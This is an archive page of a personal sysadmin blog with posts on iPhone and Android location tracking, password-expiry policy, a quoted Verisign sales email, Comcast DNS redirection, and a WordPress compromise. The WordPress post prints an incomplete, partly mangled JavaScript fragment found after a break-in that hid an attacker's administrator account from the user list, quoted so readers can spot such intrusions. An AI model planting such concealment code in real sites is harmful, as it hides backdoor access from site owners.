/usr/local.com

Privacy Wars

April 23rd, 2011 | by | apple, rants, security

Apr
23

A recently article from the guardian shows that your iPhone keeps record of everywhere you go. Many of your know that I’m an iPhone user and supporter as I have a often neglected iPhone App site.

You’re probably thinking to yourself right now, great, another fanboy coming to Apple’s rescue.

WRONG!

What the fuck Apple? Seriously, what the fuck? Is there a good reason for keeping track of this data? I mean seriously, what are you doing with it?

Actually, there is a good reason for it and its all about advertising. The guys at work have heard this on multiple occasions that the iPod, iPhone, iTouch, iPad are all marketing devices. Mainly for selling anything and everything from iTunes but with iAd, they can now sell you anything. It turns out with a little googling you can find that the Terms and Conditions changed with iOS 4 and there was a feature explained that Apple can track you to provide more relevant ads to your phone. And to also provide features such as Find My iPhone.

To provide location-based services on Apple products, Apple and our partners and licensees may collect, use, and share precise location data, including the real-time geographic location of your Apple computer or device. This location data is collected anonymously in a form that does not personally identify you and is used by Apple and our partners and licensees to provide and improve location-based products and services. For example, we may share geographic location with application providers when you opt in to their location services.

Some location-based services offered by Apple, such as the MobileMe “Find My iPhone” feature, require your personal information for the feature to work.

Apple and its partners use cookies and other technologies in mobile advertising services to control the number of times you see a given ad, deliver ads that relate to your interests, and measure the effectiveness of ad campaigns. If you do not want to receive ads with this level of relevance on your mobile device, you can opt out by accessing the following link on your device: http://oo.apple.com. If you opt out, you will continue to receive the same number of mobile ads, but they may be less relevant because they will not be based on your interests. You may still see ads related to the content on a web page or in an application or based on other non-personal information. This opt-out applies only to Apple advertising services and does not affect interest-based advertising from other advertising networks.

So does this make it right? No, I don’t think so. I think this sort of tracking is very very wrong. If you want to put up a service like this, it should be in the app to disclose my location. If I’m a developer, I have to allow for this pop up to appear. But apparently apple and their iAds do not. That is where we have an issue. The end user is used to the pop up appearing and only then does their location information get used. However, Apple apparently bypasses this for their iAd service which is not honoring the end user wishes in all cases.

So what can you do?

I know I only have myself to blame for this one as I should have read the terms and conditions more closely. But there is a way out of it. Just as you read above, simply go to http://oo.apple.com/ on your iOS device and you can opt out of the tracking. (Credit Geeky-Gadgets.com for this post.

What about Google

Don’t worry Android fans, you’re not left out in the cold either. Turns out the Wall Street Journal has discovered that Google is also transmitting data from the Android.

And don’t forget about the google street cars and their tomfoolery.

There is a site out there that can map the location of your wireless router via the Google Android’s Wardriving Database. I put in the mac address of my wireless router and was not surprised to find it in there with a GPS coordinate of my street. Awesome!

So now what?

Like many people out there, I was pretty pissed at Apple and Google to begin with. But at the same time, its my own damn fault, I didn’t read the Terms and Conditions like I should.

We live in a society of ever increasing intrusions into our private lives. These intrusions must be fought off in order to keep our private lives private. So my friends, opt out whenever you can and stay vigilant of new “features” that are released. Your privacy is only good if you fight to protect it.

Comments Closed

20%

January 2nd, 2010 | by | security, sysadmin

Jan
02

We launched our Hosted Exchange 2007 Product just over a year ago. And for the most part, things have gone great.

One of our early decisions was to balance the security of the system while making the system as user friendly as possible. Originally, we had a pretty strict password policy. We soon found that many of our customers were not too happy with this policy and thought it was too much. Were we out of control security freaks? Shouldn’t the customer appreciate the steps that we are taking to not only secure our servers, but their information!

Looking around at other vendors, we quickly found that we may be a bit too harsh. Take Gmail for example. Sure its not exchange. But then again it has over 100 million users. If they had massive issues with security and hacking, they clearly have it under control behind the scenes so things do not get out of hand.

And have you ever been prompted to change your password on gmail? I haven’t.

So we compromised. We altered the time between when the system forces you to change your password. We altered the number of passwords that you could recycle. And we also added a somewhat buried feature in our customer portal. That feature, ‘allow passwords to never expire’

Holy crap! Let’s just blow a huge freaking hole in the security system shall we.

This was a feature that we were not all that happy about, but with the other measures in place we figured we would avoid passwords such as abc123. It makes the end user happy, we have some level of security though not as high and tight as we would like. But its better than having things wide open.

Now here is the shocking part of this. 20% of our users have this feature enabled. 20-feaking-percent! I was really hoping for this number to be in the 5-10% range.
But no, 1 in 5 of our users will never change their password again.

Or will they?

I’m currently developing a nag script that will send out a reminder to the end users ever couple of months. Not enough to completely annoy the heck out of them. But hopefully enough to get a good portion of that 20% to change their passwords on a semi-regular basis.

So what do you do for your password policy? Leave your tips and tricks in the comments section. We’d like to hear what you think is an acceptable policy to stay secure!

Comments Closed

WordPress Security Concern

September 13th, 2009 | by | security, sysadmin

Sep
13

I’m not sure if you’ve applied the latest updates for wordpress but I did last week. However, it appears that someone got in to one of the blogs that I manage and created an account for themselves. They didn’t do anything with it, but they DID have full admin access. I’m assuming that this was due to a security bug in 2.8.3 as they were in when that was on the server.

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit on the users on the site and noticed that the count next to Administrators stated that there were 3 Admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name for an admin. And peaking in the wp_usermeta table, I noticed the following attribute was assigned to their firstname:

for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator ((d+)) if(n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator ((d+))Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);

Its not formatted the greatest, but basically, it hides the username from the list. Nice eh! Simply deleting this entry made the user show up in the user list where I was able to do some auditing before blowing away the user.

So audit your admin list and patch your servers! This could have been a lot worse if they had starting defacing the site or hiding other gems on there.

-Matt

Comments Closed

Verisign Spam

July 21st, 2009 | by | rants, security, spam, sysadmin

Jul
21

Some people never learn. If you spam me, there is a good chance that I WILL mock you on the internet. Sure my site gets all of 2 readers a week, but they will know how big of a jackass you are.

Here is the spam that I got from Verisign:

—— Forwarded Message
From: “Borgches, Sergio”
Date: Thu, 16 Jul 2009 11:39:24 -0500
To: Webmaster
Subject: Ineffective EV SSL Certificate on domain: my.lightedge.com

Dear Webmaster

Ineffective EV SSL Certificate on domain: my.lightedge.com

Are you aware that the Extended Validation (EV) SSL Certificate that
you have on your domain does not display the standard EV interface
that your customers are expecting on Firefox 3.5?

Mozilla launched the latest version of their browser, on 2 July 2009.
Not only has it won the Guinness World Record for more than a
million downloads in a short time, but Firefox 3 currently accounts
for over 20% of global browser market share.

Instead of displaying the GREEN address bar, which reassures visitors
that your site is safe and authentic, it is displaying the BLUE
address bar, which means they do not get the full benefit of EV.
(Please see screenshot attached).

A rapidly growing portion of your Web site visitors are not seeing
the green address bar. It has shown in research that users look for
the green address bar on the sites with which they transact and that
77% of users will hesitate to complete the transaction on a site that
once had the green address bar but no longer does (TecEd study,
2007).

VeriSign is the leader in EV SSL security and we would like to assist
you to rectify this problem by offering you a replacement EV SSL
Certificate AT NO CHARGE! Our Extended Validation SSL Certificates
trigger the green bar in Firefox 3.5. We work closely with the
browser manufacturers to make sure that our customers’ security is
always world class and that there are no interruptions in your online
security.

To take advantage of this offer, and to make sure that your address
bar is GREEN in all current EV-enabled browsers please contact me and
I’ll help you switch to VeriSign, the worldwide leader in trusted
Internet communications and commerce.

Yours faithfully

Sergio Borgches
Inside Sales Executive
VeriSign Security Services
sborgches@verisign.com
Toll Free: 866.893.6565 option 1 ext 2296

First off Sergio, the webmaster address? Really? Like anyone really reads that stuff anymore. Half the time these go to an admin buried deep in cubeland who has filters that take webmaster, hostmaster and yourmom@domain.com and filter them into the bit bucket. I have these same filters, I’m that guy! I just happened to be going through my spam folder (yes, it was caught as spam Sergio!) when I found this little gem. I just couldn’t pass it up. Here’s my advice Sergio, if you really wanted to get someone’s attention, you CALL them.

Now, besides the fact that you didn’t call, this is a bit like ambulance chasing if you ask me. And I can’t say that I really blame you for it, but it still makes you a scum bag. The issue isn’t with the certificate. The certificate is STILL an Extended Validation (EV) certificate that shows up with the green bar in just about every browser that is out there except for Firefox 3.5. Why? Well its a bug in the browser. More details can be found here. If you happen to have a Verisign, Thawte or I think GeoTrust, you’re fine. This just seems to be an issue with a few providers. Globalsign being one of those. But never fear, addons.mozilla.com is also protected by a GlobalSign EV certificate so they are well aware of this issue. But instead of taking the high road and just putting out a press release saying that Verisign customers are not affected by the latest EV certificate issues in FireFox 3.5, you took the lowest road of them all and sent out spam spreading fear, uncertainty and doubt. Way to keep it classy!

So this Sergio is why I’m not going to swing my business over to you. Sure you’re just trying to get a leg up on the competition. But the methods in which you are doing it make me want to work with GlobalSign even more.

Comments Closed

Is there really that much money in it?

June 9th, 2009 | by | security, sysadmin

Jun
09

Disclaimer: I’m not a Comcast subscriber, but I play one on TV

Comcast has me scratching my head. A friend of mine pointed out the following post on the Comcast goofiness. For a long time now they have been messing with DNS and if you happen to screw up and look up a site that does not exist in DNS, you get the Comcast ad page. Many of the tech savvy folks out there simply got around that by putting up their own caching server or using opendns. I know I did when I found out that Mediacom started messing with DNS like this.

Apparently they have upped their game by routing all DNS traffic, no matter what, to their servers. You have no way around this, you WILL use their servers.

I disagree with the first practice of just having a * domain that has everything mis-spelled go to a certain site of yours. Now that they have taken this to a new level, I think it is quickly climbing up the all time ranks of dangerous and stupid.

Really, dangerous? Well, say I’m a person that has highly questionable morals and decides that the best way to attack a competative ISP is to go after their DNS servers. I could try and do some sort of DDoS. Or, the better, more devious approach is to attempt a DNS cache poisoning on their servers. Not always the easiest, but when done properly can have some pretty devastating effects. Now, I trust that Comcast has employed some top notch admins over there so I highly doubt that they are going to let their guard down here, but we’re all humans. We still make mistakes.

Why is this stupid? Honestly, do you click on the ads on one of these pages? Or do you swear to yourself, type it in correctly or load up google and search for what you really want? It just seems like a lot of hassle to implement and all they are really doing is pissing off their customers. They’re trying to milk every last cent out of them and the customers are not stupid. They know what comcast is trying to do. They’re pissed off and eventually they will leave.

The sad part is, other ISPs have already taken up the first goofy solution that Comcast put in place. Its only a matter of time until more people adopt this new tactic. For me personally, I’m going to smack the crap out of the first person that mentions this as a solution that we should deploy. I set up our DNS servers and I refuse to break the internet. I also have a higher respect for my customers. They’re all intelligent, reasonable, and good looking right?

Comments Closed

Older Posts